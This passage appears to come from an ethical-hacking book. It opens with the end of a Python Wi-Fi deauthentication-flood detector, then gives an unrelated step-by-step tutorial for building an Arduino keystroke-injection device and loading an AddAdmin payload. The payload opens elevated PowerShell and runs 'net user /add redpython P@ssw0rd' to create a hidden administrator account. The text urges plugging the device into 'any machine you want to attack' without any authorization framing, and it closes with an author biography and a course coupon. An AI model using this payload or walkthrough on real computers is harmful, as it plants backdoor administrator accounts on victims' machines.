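        q = recent[bssid]
        q.append((t, addr1))
        while q and t - q[0][0] > window_s:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            targets = sorted({a for _, a in q})
            alerts[bssid] = {
                "first_seen": q[0][0],
                "frames_in_window": len(q),
                "targets": targets,
                "broadcast": BROADCAST in targets,   # a broadcast deauth hits every client
            }
    return alerts


if __name__ == "__main__":
    for bssid, alert in deauth_flood_alerts(build_sample()).items():
        print(f"deauth flood from {bssid}: {alert}")
```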

Create a $3 Rubber Ducky Key-logger

Rubber Ducky is a keystroke injection tool disguised as a generic USB drive,
as described on the hackshop.com website. It is priced at $45, and on top of
that you have to add shipping and customs clearance costs, so it becomes
really expensive. However, Rubber Ducky has a simple scripting language
that anyone can use to craft payloads that perform a myriad of actions, such
as changing system settings, creating backdoors, stealing data, and opening
remote shells. It can attack any operating system that supports a USB
keyboard: just put your payload on the USB and once it is plugged into any
computer, it runs automatically. We can achieve the same result by building
a similar USB device in a much cheaper way using Arduino.
Arduino boards are available commercially in preassembled form or as a
do-it-yourself kit. Go to aliexpress.com and type in Arduino micro. Some of
the boards are really small and have a built-in USB connector, which makes
it easier to achieve a result similar to a Rubber Ducky.

Some of you might wonder how an Arduino can be used to hack computers.
Since it supports keyboard emulation, we can build sketches in the Arduino
IDE (a sketch is a file with the .ino extension) that contain keyboard
instructions to type commands and execute them, just like the popular USB
Rubber Ducky does. We upload our payload, and once the USB is inserted,
the script runs automatically. So let us start building that.
You need to install the Arduino IDE. Simply go to the console and write
apt-get install arduino to install the IDE. To open the IDE, write arduino in
the terminal.
Go to the website
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. It is an
amazing page that has a lot of Rubber Ducky scripts.
So, let us begin with the first and simplest one, hello world. If you click on
it, you will be able to see the simple scripting language that Rubber Ducky
supports.

But Arduino does not support the Ducky scripting language, so we have to
convert it to the Arduino language. Navigate to the
https://d4n5h.github.io/Duckuino/ website to convert the Ducky script into
Arduino code: paste your code, press compile, and then press copy.
After that, open the Arduino IDE and paste the converted script. To give you
a quick overview of how this code works: as you can see below, this is a
sketch file, just a regular file with the .ino extension. It has two main
procedures, the setup procedure and the loop procedure, and it also includes
some important header files.
The setup procedure is executed only once, when the Arduino is powered on
and initialized; the loop procedure is executed repeatedly, over and over,
until the Arduino is powered off.
Now plug the Arduino board into the laptop with a mini USB cable. Go to
the Tools menu and select the board, Arduino Leonardo, and the port, COM6.
Compile the converted hello world code you pasted; you should receive the
message 'Done compiling'. Upload the sketch to the board by pressing the
upload button. Open Notepad, then plug in the device, to see the following:

Let us get real by going to
https://github.com/christofersimbar/ArduinoDuckyScript/tree/master/AddAdmin_Payload.
This payload adds a user as an admin to the computer once you plug the USB
into it. So dangerous, ha!
Copy the file content, convert it to an Arduino sketch, and upload it to the
board. If you scan this code, you will see that in setup it starts the keyboard
and mouse, then starts the payload by pressing Windows 'x', that is, the left
Windows key plus 'x', and then types 'a' to open a PowerShell prompt. After
that, it sends KEY_LEFT_ALT and 'y' to select yes. Then, in the PowerShell
prompt, it issues the line net user /add redpython P@ssw0rd. After creating
this user, it adds it to the administrators group, as shown below.

Compile and upload the code to the board. You have to remove the USB as
fast as possible to avoid the payload running on your own computer. Our
payload is now loaded onto the Arduino device.
All you need to do is plug the USB into any machine you want to attack.
Once you do that, the sequence takes place in a matter of seconds. Open the
user accounts and you will see that the redpython user has been created in
the administrators group.
Biography
Mohamad Mahjoub is a prolific writer and a Cyber Security Expert. He is a
licensed and certified CISSP, ISO 27005 Risk Manager, CISA, PMP, ISO
27001 LI, and ITIL. He obtained his Master's Degree in Computer Science
from the Lebanese American University, where he graduated magna cum
laude. After spending many years working as an IT project manager for a
multinational pharmaceutical company, Mohamad moved to the banking
sector to take a senior role in Information Security Audit. He then relocated
to Dubai to join a smart university as an Information Security Manager.
Mohamad's accomplishments and research acumen are a driving force rooted
in his professionalism. He is trained and certified to offer firsthand
professional Cyber Security services to individuals and companies. Since
2012, Mohamad has delivered many IT courses to fresh graduates, IT
professionals, executive management, and business owners, on top of his
online multilingual Cyber Security courses, which have more than 100,000
students enrolled worldwide to date. Currently, Mohamad works as CISO for
a French multinational company, where he is responsible for the security of
the IT and OT of its industrial water technology operations throughout the
Arabian Gulf and Middle East area. With more than 16 years of experience
in the Cyber Security field, Mohamad is a trusted expert who has established
a track record of success in the Cyber Security domain.
In a world of ubiquitous technology, Mohamad believes that Cyber Security
is more important than ever.
I will be glad to connect with you through LinkedIn:
https://www.linkedin.com/in/mohammadmahjoub/

Also by Mohamad Mahjoub

https://www.xploitacademy.com
Claim your free 'Ethical Hacking with Kali Linux' course by using the
coupon KALIPENTEST.
You can as well use this link:
https://www.xploitacademy.com/courses/ethical-hacking-with-kali-linux?coupon=KALIPENTEST
